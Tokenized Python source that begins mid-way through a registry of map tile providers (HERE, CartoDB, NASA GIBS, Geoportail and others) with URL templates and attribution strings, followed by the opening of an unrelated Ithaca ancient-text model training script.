mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.grey.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayGreyMobile') normalDayTransit=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.transit' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayTransit') normalDayTransitMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' 
subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.transit.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayTransitMobile') normalNight=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNight') normalNightMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNightMobile') normalNightGrey=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night.grey' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNightGrey') normalNightGreyMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night.grey.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNightGreyMobile') normalNightTransit=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night.transit' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNightTransit') normalNightTransitMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.night.transit.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalNightTransitMobile') reducedDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='reduced.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' 
name='HERE.reducedDay') reducedNight=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='reduced.night' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.reducedNight') basicMap=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day' max_zoom=20 type='basetile' language='eng' format='png8' size='256' name='HERE.basicMap') mapLabels=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day' max_zoom=20 type='labeltile' language='eng' format='png' size='256' name='HERE.mapLabels') trafficFlow=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='traffic' variant='normal.day' max_zoom=20 type='flowtile' language='eng' format='png8' size='256' name='HERE.trafficFlow') carnavDayGrey=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='carnav.day.grey' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.carnavDayGrey') hybridDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='hybrid.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.hybridDay') hybridDayMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='hybrid.day.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.hybridDayMobile') hybridDayTransit=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' 
base='aerial' variant='hybrid.day.transit' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.hybridDayTransit') hybridDayGrey=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='hybrid.grey.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.hybridDayGrey') pedestrianDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='pedestrian.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.pedestrianDay') pedestrianNight=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='pedestrian.night' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.pedestrianNight') satelliteDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='satellite.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.satelliteDay') terrainDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='terrain.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.terrainDay') terrainDayMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='aerial' variant='terrain.day.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.terrainDayMobile')) FreeMapSK=TileProvider(url='http://t{s}.freemap.sk/T/{z}/{x}/{y}.jpeg' min_zoom=8 max_zoom=16 subdomains='1234' bounds=[[47.204642 15.996093] [49.830896 22.576904]] attribution='(C) OpenStreetMap contributors, vizualization CC-By-SA 2.0 Freemap.sk' name='FreeMapSK') MtbMap=TileProvider(url='http://tile.mtbmap.cz/mtbmap_tiles/{z}/{x}/{y}.png' attribution='(C) OpenStreetMap contributors & USGS' name='MtbMap') CartoDB=Bunch(Positron=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='light_all' 
name='CartoDB.Positron') PositronNoLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='light_nolabels' name='CartoDB.PositronNoLabels') PositronOnlyLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='light_only_labels' name='CartoDB.PositronOnlyLabels') DarkMatter=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='dark_all' name='CartoDB.DarkMatter') DarkMatterNoLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='dark_nolabels' name='CartoDB.DarkMatterNoLabels') DarkMatterOnlyLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='dark_only_labels' name='CartoDB.DarkMatterOnlyLabels') Voyager=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='rastertiles/voyager' name='CartoDB.Voyager') VoyagerNoLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='rastertiles/voyager_nolabels' name='CartoDB.VoyagerNoLabels') VoyagerOnlyLabels=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='rastertiles/voyager_only_labels' name='CartoDB.VoyagerOnlyLabels') VoyagerLabelsUnder=TileProvider(url='https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png' attribution='(C) OpenStreetMap contributors (C) CARTO' subdomains='abcd' max_zoom=19 variant='rastertiles/voyager_labels_under' name='CartoDB.VoyagerLabelsUnder')) HikeBike=Bunch(HikeBike=TileProvider(url='https://tiles.wmflabs.org/{variant}/{z}/{x}/{y}.png' max_zoom=19 attribution='(C) OpenStreetMap contributors' variant='hikebike' name='HikeBike.HikeBike') HillShading=TileProvider(url='https://tiles.wmflabs.org/{variant}/{z}/{x}/{y}.png' max_zoom=15 attribution='(C) OpenStreetMap contributors' variant='hillshading' name='HikeBike.HillShading')) BasemapAT=Bunch(basemap=TileProvider(url='https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}' max_zoom=20 attribution='Datenquelle: basemap.at' subdomains=['' '1' '2' '3' '4'] format='png' bounds=[[46.35877 8.782379] [49.037872 17.189532]] variant='geolandbasemap' name='BasemapAT.basemap') grau=TileProvider(url='https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}' max_zoom=19 attribution='Datenquelle: basemap.at' subdomains=['' '1' '2' '3' '4'] format='png' bounds=[[46.35877 8.782379] [49.037872 17.189532]] variant='bmapgrau' name='BasemapAT.grau') overlay=TileProvider(url='https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}' max_zoom=19 attribution='Datenquelle: basemap.at' subdomains=['' '1' '2' '3' '4'] format='png' bounds=[[46.35877 8.782379] [49.037872 17.189532]] variant='bmapoverlay' 
name='BasemapAT.overlay') highdpi=TileProvider(url='https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}' max_zoom=19 attribution='Datenquelle: basemap.at' subdomains=['' '1' '2' '3' '4'] format='jpeg' bounds=[[46.35877 8.782379] [49.037872 17.189532]] variant='bmaphidpi' name='BasemapAT.highdpi') orthofoto=TileProvider(url='https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}' max_zoom=20 attribution='Datenquelle: basemap.at' subdomains=['' '1' '2' '3' '4'] format='jpeg' bounds=[[46.35877 8.782379] [49.037872 17.189532]] variant='bmaporthofoto30cm' name='BasemapAT.orthofoto')) nlmaps=Bunch(standaard=TileProvider(url='https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png' min_zoom=6 max_zoom=19 bounds=[[50.5 3.25] [54 7.6]] attribution='Kaartgegevens (C) Kadaster' variant='brtachtergrondkaart' name='nlmaps.standaard') pastel=TileProvider(url='https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png' min_zoom=6 max_zoom=19 bounds=[[50.5 3.25] [54 7.6]] attribution='Kaartgegevens (C) Kadaster' variant='brtachtergrondkaartpastel' name='nlmaps.pastel') grijs=TileProvider(url='https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png' min_zoom=6 max_zoom=19 bounds=[[50.5 3.25] [54 7.6]] attribution='Kaartgegevens (C) Kadaster' variant='brtachtergrondkaartgrijs' name='nlmaps.grijs') luchtfoto=TileProvider(url='https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wmts/1.0.0/2016_ortho25/EPSG:3857/{z}/{x}/{y}.png' min_zoom=6 max_zoom=19 bounds=[[50.5 3.25] [54 7.6]] attribution='Kaartgegevens (C) Kadaster' name='nlmaps.luchtfoto')) NASAGIBS=Bunch(ModisTerraTrueColorCR=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=9 format='jpg' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_CorrectedReflectance_TrueColor' name='NASAGIBS.ModisTerraTrueColorCR') ModisTerraBands367CR=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=9 format='jpg' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_CorrectedReflectance_Bands367' name='NASAGIBS.ModisTerraBands367CR') ViirsEarthAtNight2012=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' 
bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=8 format='jpg' time='' tilematrixset='GoogleMapsCompatible_Level' variant='VIIRS_CityLights_2012' name='NASAGIBS.ViirsEarthAtNight2012') ModisTerraLSTDay=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=7 format='png' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_Land_Surface_Temp_Day' opacity=0.75 name='NASAGIBS.ModisTerraLSTDay') ModisTerraSnowCover=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=8 format='png' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_Snow_Cover' opacity=0.75 name='NASAGIBS.ModisTerraSnowCover') ModisTerraAOD=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=6 format='png' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_Aerosol' opacity=0.75 name='NASAGIBS.ModisTerraAOD') ModisTerraChlorophyll=TileProvider(url='https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}' attribution='Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.' 
bounds=[[-85.0511287776 -179.999999975] [85.0511287776 179.999999975]] min_zoom=1 max_zoom=7 format='png' time='' tilematrixset='GoogleMapsCompatible_Level' variant='MODIS_Terra_Chlorophyll_A' opacity=0.75 name='NASAGIBS.ModisTerraChlorophyll')) NLS=TileProvider(url='https://nls-{s}.tileserver.com/nls/{z}/{x}/{y}.jpg' attribution='National Library of Scotland Historic Maps' bounds=[[49.6 -12] [61.7 3]] min_zoom=1 max_zoom=18 subdomains='0123' name='NLS') JusticeMap=Bunch(income=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='income' name='JusticeMap.income') americanIndian=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='indian' name='JusticeMap.americanIndian') asian=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='asian' name='JusticeMap.asian') black=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='black' name='JusticeMap.black') hispanic=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='hispanic' name='JusticeMap.hispanic') multi=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='multi' name='JusticeMap.multi') nonWhite=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='nonwhite' name='JusticeMap.nonWhite') white=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='white' name='JusticeMap.white') plurality=TileProvider(url='http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png' attribution='Justice Map' size='county' bounds=[[14 -180] [72 -56]] variant='plural' name='JusticeMap.plurality')) Wikimedia=TileProvider(url='https://maps.wikimedia.org/osm-intl/{z}/{x}/{y}{r}.png' attribution='Wikimedia' min_zoom=1 max_zoom=19 name='Wikimedia') GeoportailFrance=Bunch(parcels=TileProvider(url='https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}' attribution='Geoportail France' bounds=[[-75 -180] [81 180]] min_zoom=2 max_zoom=20 apikey='choisirgeoportail' format='image/png' style='bdparcellaire' variant='CADASTRALPARCELS.PARCELS' name='GeoportailFrance.parcels') ignMaps=TileProvider(url='https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}' attribution='Geoportail France' bounds=[[-75 -180] [81 180]] min_zoom=2 max_zoom=18 apikey='choisirgeoportail' format='image/jpeg' style='normal' variant='GEOGRAPHICALGRIDSYSTEMS.MAPS' name='GeoportailFrance.ignMaps') 
maps=TileProvider(url='https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}' attribution='Geoportail France' bounds=[[-75 -180] [81 180]] min_zoom=2 max_zoom=18 apikey='choisirgeoportail' format='image/jpeg' style='normal' variant='GEOGRAPHICALGRIDSYSTEMS.MAPS.SCAN-EXPRESS.STANDARD' name='GeoportailFrance.maps') orthos=TileProvider(url='https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}' attribution='Geoportail France' bounds=[[-75 -180] [81 180]] min_zoom=2 max_zoom=19 apikey='choisirgeoportail' format='image/jpeg' style='normal' variant='ORTHOIMAGERY.ORTHOPHOTOS' name='GeoportailFrance.orthos')) OneMapSG=Bunch(Default=TileProvider(url='https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png' variant='Default' min_zoom=11 max_zoom=18 bounds=[[1.56073 104.11475] [1.16 103.502]] attribution='![](https://docs.onemap.sg/maps/images/oneMap64-01.png) New OneMap | Map data (C) contributors, Singapore Land Authority' name='OneMapSG.Default') Night=TileProvider(url='https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png' variant='Night' min_zoom=11 max_zoom=18 bounds=[[1.56073 104.11475] [1.16 103.502]] attribution='![](https://docs.onemap.sg/maps/images/oneMap64-01.png) New OneMap | Map data (C) contributors, Singapore Land Authority' name='OneMapSG.Night') Original=TileProvider(url='https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png' variant='Original' min_zoom=11 max_zoom=18 bounds=[[1.56073 104.11475] [1.16 103.502]] attribution='![](https://docs.onemap.sg/maps/images/oneMap64-01.png) New OneMap | Map data (C) contributors, Singapore Land Authority' name='OneMapSG.Original') Grey=TileProvider(url='https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png' variant='Grey' min_zoom=11 max_zoom=18 bounds=[[1.56073 104.11475] [1.16 103.502]] attribution='![](https://docs.onemap.sg/maps/images/oneMap64-01.png) New OneMap | Map data (C) contributors, Singapore Land Authority' name='OneMapSG.Grey') LandLot=TileProvider(url='https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png' variant='LandLot' min_zoom=11 max_zoom=18 bounds=[[1.56073 104.11475] [1.16 103.502]] attribution='![](https://docs.onemap.sg/maps/images/oneMap64-01.png) New OneMap | Map data (C) contributors, Singapore Land Authority' name='OneMapSG.LandLot')))<line_sep>
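# --- Hedged usage sketch (editor addition): shows how one of the providers defined above
# could be expanded into a concrete tile URL. It assumes TileProvider supports dict-style
# key access (as in contextily/xyzservices); that assumption and the sample z/x/y tile
# indices are illustrative, not taken from this file. ---
<if_stmt>__name__<eq>'__main__'<block_start>provider=JusticeMap.income<line_sep># Fill the URL template for one z/x/y tile using the provider's own metadata.
url=provider['url'].format(size=provider['size'] variant=provider['variant'] z=5 x=9 y=12)<line_sep>print(provider['name'] url)<block_end>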
# Copyright 2021 the Ithaca Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Ithaca: Restoring and attributing ancient texts with deep neural networks."""<import_stmt>bz2<import_stmt>distutils<import_stmt>functools<import_stmt>glob<import_stmt>os<import_stmt>pickle<import_from_stmt>absl app<import_from_stmt>absl flags<import_from_stmt>absl logging<import_stmt>dataloader<import_from_stmt>ithaca.models.model Model<import_from_stmt>ithaca.util.alphabet GreekAlphabet<import_from_stmt>ithaca.util.loss categorical_kl_divergence<import_from_stmt>ithaca.util.loss cross_entropy_label_smoothing_loss<import_from_stmt>ithaca.util.loss cross_entropy_loss<import_from_stmt>ithaca.util.loss cross_entropy_mask_loss<import_from_stmt>ithaca.util.loss date_loss_l1<import_from_stmt>ithaca.util.optim adaptive_grad_clip<import_from_stmt>ithaca.util.optim linear_warmup_and_sqrt_decay<import_from_stmt>ithaca.util.optim linear_weight<import_from_stmt>ithaca.util.region_names load_region_maps<import_stmt>jax<import_stmt>jax.numpy<as>jnp<import_from_stmt>jaxline experiment<import_from_stmt>jaxline platform<import_from_stmt>jaxline utils<as>jl_utils<import_stmt>numpy<as>np<import_stmt>optax<import_stmt>tensorflow_datasets.public_api<as>tfds<line_sep>FLAGS=flags.FLAGS<class_stmt>Experiment(experiment.AbstractExperiment)<block_start>"""Ithaca experiment."""<line_sep># Holds a map from object properties that will be checkpointed to their name # within a checkpoint. Currently it is assumed that these are all sharded # device arrays. CHECKPOINT_ATTRS={'_params':'params' '_opt_state':'opt_state' }<def_stmt>__init__ self mode init_rng config<block_start>"""Initializes experiment."""<line_sep>super(Experiment self).__init__(mode=mode)<line_sep>self.mode=mode<line_sep>self.init_rng=init_rng<line_sep>self.config=config<line_sep># Same random key on each device. self._rng_key=jl_utils.bcast_local_devices(self.init_rng)<line_sep># Checkpointed experiment state. self._params=<none><line_sep>self._opt_state=<none><line_sep># Input pipelines. 